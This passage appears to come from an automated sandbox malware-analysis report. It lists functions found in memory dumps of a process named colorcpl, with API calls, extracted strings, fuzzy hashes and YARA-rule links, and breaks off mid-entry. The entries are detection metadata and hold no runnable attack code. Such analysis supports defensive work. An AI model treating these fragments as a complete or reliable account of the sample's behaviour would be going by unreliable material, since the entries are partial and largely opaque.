Opcode Fuzzy Hash: 964b0e4da47c8700d6a9d11219176d5b81c11e1b76ac7b25ac9e0a4425ec12f7
Instruction Fuzzy Hash: 08F09277BD47003AE274A5989C42FDBA788CF80B51F240125FB0CFF2C0DAE9B89146A4

Function 0330C4E6 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 0330C4DA

Memory Dump Source

Source File: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32f0000_colorcpl.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: c5b6caf61c6aeb6d39758aefbc8aa94f01e7c4a22d9336b449c405286fb77d38
Instruction ID: 66456ed084f052ca141f49f64b5fcf37b3255ebbf0ea5a4148eaea125e2a52fb
Opcode Fuzzy Hash: c5b6caf61c6aeb6d39758aefbc8aa94f01e7c4a22d9336b449c405286fb77d38
Instruction Fuzzy Hash: D8E026226012082F9F10A97A68864BBBFACDB8AA2AB1001E8DD52860A1E911C80A8191

Function 03318120 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 03318160

Memory Dump Source

Source File: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32f0000_colorcpl.jbxd

Yara matches

Similarity

API ID: Path$NameName_
String ID:
API String ID: 3514427675-0
Opcode ID: 6fb51e273ea447b5904e040123c1a0e87b8d0fa71252fcf7003c66851762db41
Instruction ID: dddcddac20a5eab4fc986f75694c2594726c7d43819727f07d84924b2d80eeba
Opcode Fuzzy Hash: 6fb51e273ea447b5904e040123c1a0e87b8d0fa71252fcf7003c66851762db41
Instruction Fuzzy Hash: F4F030B56006457FD614EE59DC40E9B77ADDFC9760F008415FA08A7240D671B9218BF5

Function 03319540 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,9403D333,00000007,00000000,00000004,00000000,03303BD5,000000F4), ref: 0331957C

Memory Dump Source

Source File: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32f0000_colorcpl.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 27bbdd54da5c965e61241d10b6020c612638fb223b0637cadf89fda0c63e04a5
Instruction ID: 47592199d3c295e0b4cc61fb8241338fe1ff2654dbd12c1134d2b2be8db8cbf1
Opcode Fuzzy Hash: 27bbdd54da5c965e61241d10b6020c612638fb223b0637cadf89fda0c63e04a5
Instruction Fuzzy Hash: 4BE06DB56002047FD614EE59DC81E9B73ADDFC5720F004019FA08AB240D671B82086B5

Function 033194F0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(03301832,?,?,03301832,033154CF,?,?,03301832,033154CF,00001000), ref: 0331952F

Memory Dump Source

Source File: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32f0000_colorcpl.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8e8f804e6e2566f97d4133197ec8a822201c655ac3a2fa4d2fbee59e578fcff7
Instruction ID: a2a4e825faaa0204fb88731fe3d7aef46aa64552eed93414a9db0931884b6bed
Opcode Fuzzy Hash: 8e8f804e6e2566f97d4133197ec8a822201c655ac3a2fa4d2fbee59e578fcff7
Instruction Fuzzy Hash: 9FE065B6600308BFD614EE59DC45F9B73ACEFC9724F404019FA08AB281D671B9208AB5

Function 03308100 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 0330812C

Memory Dump Source

Source File: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32f0000_colorcpl.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 4f6617fd5a62fc4568d9e6c02f66cfbc60d0166b2f88d4bd3319c6be46831a9b
Instruction ID: b5080c1a4a6af38f8bb2fb4e1b390993c4e6b3527626166124004ae9fc0483c0
Opcode Fuzzy Hash: 4f6617fd5a62fc4568d9e6c02f66cfbc60d0166b2f88d4bd3319c6be46831a9b
Instruction Fuzzy Hash: 81E0263164030427EB28EAA8DCC5FA233489F48664F4C4660F91CDF6C1E578F4024254

Function 03307EF0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,03301B30,03317E0E,033154CF,?), ref: 03307F23

Memory Dump Source

Source File: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32f0000_colorcpl.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 18bff222efdca047364ccdda0dae273c7697e574fba03accafcb5418ebc76b94
Instruction ID: bc208ac2a9ebe58b6520df1e7954e93b624bdb33989f382aeae1cdf333bbc7ec
Opcode Fuzzy Hash: 18bff222efdca047364ccdda0dae273c7697e574fba03accafcb5418ebc76b94
Instruction Fuzzy Hash: E1D05E75A983047BF684E6E58C46F96368C9B48654F444564BA1CFB2C1ECA9F0204A65

Function 03300C0B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111), ref: 03300C17

Memory Dump Source

Source File: 00000007.00000002.4471298397.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32f0000_colorcpl.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
Instruction ID: 6a365ec5b2de6430c3048e55f09bd4232f6678aa036a913bcdda25deb2bc706f
Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
Instruction Fuzzy Hash: 58D0137774111C76E61195D56CC1DFFF75CDB856A5F004067FF08D5140E5615D0607B1

Function 05232C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232C24

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1da3136e0d1bc11adf47541e3c3089230b59b0a9ea0655ec61c98326b3de72bb
Instruction ID: 47324ab27c78c5555b57896e2e4a6ce7ddfe3e21be942a6908cfc1f513792a09
Opcode Fuzzy Hash: 1da3136e0d1bc11adf47541e3c3089230b59b0a9ea0655ec61c98326b3de72bb
Instruction Fuzzy Hash: 3EB09B739115D5C5DB15F7604609B1779117FD0701F56C461D3070642F4778D1D1E575

Non-executed Functions

Function 055104E0 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4473572508.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5510000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7322755d39c82d0f9b079a38622af6349fcad5e475632202875febf31e825287
Instruction ID: 6fcca4e8538ea673412ee2b30316ad8b55295b86ec9fbfb70776deb7cea2d653
Opcode Fuzzy Hash: 7322755d39c82d0f9b079a38622af6349fcad5e475632202875febf31e825287
Instruction Fuzzy Hash: 22410A7161CF1D8FE328EF689085677B7E2FB85310F51052DCD8AC32A2EA74D8468789

Function 0551DF57 Relevance: 56.5, Strings: 45, Instructions: 210COMMON

Download Yara Rule

Strings

@@@@, xrefs: 0551E0FE
@@@@, xrefs: 0551E0CD
@@@?, xrefs: 0551DFC3
@@@@, xrefs: 0551E0F0
@@@@, xrefs: 0551E0BF
@@@@, xrefs: 0551E087
@@@@, xrefs: 0551E121
@@@@, xrefs: 0551E0F7
@@@@, xrefs: 0551E017
@@@@, xrefs: 0551E04F
@@@@, xrefs: 0551E0DB
@@@@, xrefs: 0551E105
@@@@, xrefs: 0551DFDF
@@@@, xrefs: 0551E10C
@@@@, xrefs: 0551E113
@@@@, xrefs: 0551E08E
@@@@, xrefs: 0551E079
@@@@, xrefs: 0551E05D
4567, xrefs: 0551DFCA
<=@@, xrefs: 0551DFD8
@@@@, xrefs: 0551E0AA
@@@@, xrefs: 0551E080
@@@@, xrefs: 0551E0D4
%&'(, xrefs: 0551E033
!"#$, xrefs: 0551E02C
)*+,, xrefs: 0551E03A
@@@@, xrefs: 0551E128
@@@@, xrefs: 0551E12F
-./0, xrefs: 0551E041
@@@@, xrefs: 0551E0A3
@@@@, xrefs: 0551E0E2
@@@@, xrefs: 0551E0B8
@@@@, xrefs: 0551E09C
@@@@, xrefs: 0551E064
?, xrefs: 0551E140
@@@@, xrefs: 0551E0E9
@@@@, xrefs: 0551E11A
@@@@, xrefs: 0551E072
@@@@, xrefs: 0551E056
@@@@, xrefs: 0551E06B
@@@@, xrefs: 0551E0B1
123@, xrefs: 0551E048
@@@@, xrefs: 0551E095
89:;, xrefs: 0551DFD1
@@@@, xrefs: 0551E0C6

Memory Dump Source

Source File: 00000007.00000002.4473572508.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5510000_colorcpl.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3558027158
Opcode ID: 9f04e1dc506f42f0de9fd4ca82da11d9677e0e2421fe9a9fa01c9eac5faa3e7b
Instruction ID: 1ad3a492aafc85b27cfba5ceed7546ef2d7845d5a48329b0fbb957dc3baac334
Opcode Fuzzy Hash: 9f04e1dc506f42f0de9fd4ca82da11d9677e0e2421fe9a9fa01c9eac5faa3e7b
Instruction Fuzzy Hash: AE9160F04482988AC7158F54A0652AFFFB5EBC6305F15816DE7E6BB243C3BE8905CB85

Function 05232890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0523293C
___swprintf_l.LIBCMT ref: 0523295E
___swprintf_l.LIBCMT ref: 052329A3
___swprintf_l.LIBCMT ref: 0526A52E

Strings

:%u.%u.%u.%u, xrefs: 0526A5B8
::ffff:0:%u.%u.%u.%u, xrefs: 0526A54E
::%hs%u.%u.%u.%u, xrefs: 0526A527
ffff:, xrefs: 0526A504

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 898492acaf74ea289a4b1abf374ae8ce343aa8fa6b5fcf45f2a67521d94f0700
Instruction ID: 55e7c002fa58ce6702778abfdb8f66d052e820b40cdc1f432d31f099f6deb168
Opcode Fuzzy Hash: 898492acaf74ea289a4b1abf374ae8ce343aa8fa6b5fcf45f2a67521d94f0700
Instruction Fuzzy Hash: FE51D7B5E24156FFCB20DF9888D197EF7B9BF08200B548169E569D7641E374EE408BA0

Function 052A2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 052A24A6
___swprintf_l.LIBCMT ref: 052A24E2
___swprintf_l.LIBCMT ref: 052A257D
___swprintf_l.LIBCMT ref: 052A25A3
___swprintf_l.LIBCMT ref: 052A25C8
___swprintf_l.LIBCMT ref: 052A2608

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 052A24DA
::%hs%u.%u.%u.%u, xrefs: 052A249E
:%u.%u.%u.%u, xrefs: 052A25FF
ffff:, xrefs: 052A247D, 052A249D

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 1726362b60b7816840ea05c8f4a0401350845398795de48fc03e25dfb4219b64
Instruction ID: 69c6e08de18c725c02efef432268447bf0a88a4a7f05f9db4dca87338ef8d24a
Opcode Fuzzy Hash: 1726362b60b7816840ea05c8f4a0401350845398795de48fc03e25dfb4219b64
Instruction Fuzzy Hash: B851397AA14656EFCB34DF6CC89087FB7FAFF44300B048859E59AD7641D6B4EA408B60

Function 05227630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 052646FC
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05264725
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05264655
CLIENT(ntdll): Processing section info %ws..., xrefs: 05264787
ExecuteOptions, xrefs: 052646A0
Execute=1, xrefs: 05264713
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05264742

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: faa68f7d9e38168bfb6922f244681b6d4c4f88b7dcd48a44ac8e729dee561031
Instruction ID: 9618c4151f1b693517502a8edc67407a771e225d5598a2aff000df6421533033
Opcode Fuzzy Hash: faa68f7d9e38168bfb6922f244681b6d4c4f88b7dcd48a44ac8e729dee561031
Instruction Fuzzy Hash: 8651197576822A7ADF11EBA4DC8EFB977A9FF04300F0800A9E509AB190DB709E45CF51

Function 05513BD1 Relevance: 13.8, Strings: 11, Instructions: 54COMMON

Download Yara Rule

Strings

RIWG, xrefs: 05513BFA
WIU, xrefs: 05513C86
UQIW, xrefs: 05513C63
QS\G, xrefs: 05513C24
VWVG, xrefs: 05513C4E
WVWW, xrefs: 05513C47
G0(0, xrefs: 05513C1D
QIWI, xrefs: 05513C7F
QIWN, xrefs: 05513C32
G)3G, xrefs: 05513C0F
QIU\, xrefs: 05513C16

Memory Dump Source

Source File: 00000007.00000002.4473572508.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5510000_colorcpl.jbxd

Similarity

API ID:
String ID: G)3G$G0(0$QIU\$QIWI$QIWN$QS\G$RIWG$UQIW$VWVG$WIU$WVWW
API String ID: 0-3237216922
Opcode ID: 0101aa6a1e9d4250d2d5c20a9ff30ae71b440874b8718c4f298eb99cbf6dd478
Instruction ID: 5d35eb5eba462b9d40708295c0751ea84999de8b92788c3940d6b576e23e4162
Opcode Fuzzy Hash: 0101aa6a1e9d4250d2d5c20a9ff30ae71b440874b8718c4f298eb99cbf6dd478
Instruction Fuzzy Hash: 4A212EB0C0068D9ACB10DFD1D9996EEFFB1FB00308F218058C969AF240C7744A4ACF80

Function 052C6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: e0ef68d2a7eea9ac5625c4e33a67ef1298c075dfe9cad45a7c62da119665249a
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: 2B021471628341AFC305CF68C494E6ABBE5FFC8700F148A6DF9899B265DB71E905CB42

Function 0523B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0523B6BF

Strings

-, xrefs: 0523B650
0, xrefs: 0523B695
+, xrefs: 0523B65A
0, xrefs: 0523B66F

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 469be294fc5489e948e640e0ddd14f98a53ec98146946d79ff786e06ff718ae6
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 1D8191F1E2924A9ADF24CF68C8927FEBBB2FF45310F18415AD895A7291C77498418B50

Function 052A20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 052A214F
___swprintf_l.LIBCMT ref: 052A2172

Strings

%%%u, xrefs: 052A2146
[, xrefs: 052A212B
]:%u, xrefs: 052A2169

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 501defaa7806d619b76816420bcca805f8e7941c813db0ca33d5e51cd734372c
Instruction ID: 3316f86d7575169538c149dc6be1bce04f37059a94f25f31022eea5d5db93197
Opcode Fuzzy Hash: 501defaa7806d619b76816420bcca805f8e7941c813db0ca33d5e51cd734372c
Instruction Fuzzy Hash: 1521517BA2011AEBCB10DE69D845ABEBBF9AF44744F040126E915E7201EB30D9018BA1

Function 0521F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 052602BD
RTL: Re-Waiting, xrefs: 0526031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 052602E7

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: b58013d12c46e5b24eb5af69d2836e09ed3189125987c8ced10bcf8b204d66ed
Instruction ID: fdde31dfaf44939efce2195f5816c75587237c3f450e9d2f2856991ab68823b4
Opcode Fuzzy Hash: b58013d12c46e5b24eb5af69d2836e09ed3189125987c8ced10bcf8b204d66ed
Instruction Fuzzy Hash: 96E1C2706287429FD725CF28C988B2BB7E1BF94314F140A5DF8A98B2D0D774E885CB56

Function 0522BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05267B7F
RTL: Re-Waiting, xrefs: 05267BAC
RTL: Resource at %p, xrefs: 05267B8E

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 5787eed4339ab38eaed64339c16a4c20f900a805926a1e65f84bb0f981e3ad2c
Instruction ID: 94f3ed3ccb00b62ac8f0615a03ef64bf827c0d95068b8da1c6fe2bd6bf2c88a3
Opcode Fuzzy Hash: 5787eed4339ab38eaed64339c16a4c20f900a805926a1e65f84bb0f981e3ad2c
Instruction Fuzzy Hash: 2241E139328702AFC720DE25D840B6AB7E6FF88720F100A1DF95A9B280DB71E445CB91

Function 0522B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0526728C

Strings

RTL: Re-Waiting, xrefs: 052672C1
RTL: Resource at %p, xrefs: 052672A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05267294

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: d74ec254e9c0afb2fb8579932bb48dcb0f4658400ebbab2d2bf259fa9cc168b2
Instruction ID: 925d04a1971d412abb586ccab666152ade8a5cb01be249acf8ccba1f7da54e11
Opcode Fuzzy Hash: d74ec254e9c0afb2fb8579932bb48dcb0f4658400ebbab2d2bf259fa9cc168b2
Instruction Fuzzy Hash: 79411F35724216ABC720DE24CC81F6AB7A6FF84714F140619FC59AB280DB31F882CBD0

Function 052A2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 052A238D
___swprintf_l.LIBCMT ref: 052A23B3

Strings

]:%u, xrefs: 052A23AA
%%%u, xrefs: 052A2384

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: ec1643175bf3731e2a6a91e86b0d17f251987605e880ba9a68214ba427b7c4ce
Instruction ID: da63bfd61b7d37c0b4f2a34617d9d7d11db47fee8b2582ffe223070ea9f88258
Opcode Fuzzy Hash: ec1643175bf3731e2a6a91e86b0d17f251987605e880ba9a68214ba427b7c4ce
Instruction Fuzzy Hash: 04317176A20229DFCB24DE28DC44BAEB7E8FF45710F440556E849E7240EB30AA448FA0

Function 05237D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 05237E8B

Strings

+, xrefs: 05237DE8
-, xrefs: 05237DDD

Memory Dump Source

Source File: 00000007.00000002.4472983432.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.4472983432.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4472983432.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 599aafb1a2fbac2749585f3fce9e42e0e0929a2fc6439cc2c59c11fe38e88cac
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 309186F0F2421B9BDF24DF69C882ABEB7A6FF44720F18451AE859E72C0D7709A418750

Function 051F9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 051F9191
@, xrefs: 051F9175

Memory Dump Source

